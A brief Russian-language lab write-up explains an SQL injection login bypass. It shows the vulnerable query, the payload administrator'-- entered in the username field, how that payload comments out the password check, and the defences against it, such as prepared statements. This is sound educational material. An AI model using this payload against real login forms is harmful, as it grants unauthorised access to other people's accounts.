SQL Injection Authentication Bypass Lab - Обход авторизации через SQL инъекцию
🎯 Краткое описание
Лаборатория демонстрирует критическую уязвимость SQL инъекции в системе аутентификации. Используя payload administrator'-- в поле username, атакующий обходит проверку пароля и получает доступ к учётной записи администратора без знания пароля.

🔧 Техническая суть
Уязвимый SQL запрос: SELECT * FROM users WHERE username = '[input]' AND password = '[input]'
Payload: administrator'--
Результат: SELECT * FROM users WHERE username = 'administrator'--' AND password = '[input]'
Символ -- комментирует условие проверки пароля, позволяя войти как администратор.

🛡️ Защита
Использование параметризованных запросов (Prepared Statements)

Валидация и санация пользовательского ввода

Хэширование паролей с солью (salt)

Внедрение WAF (Web Application Firewall)
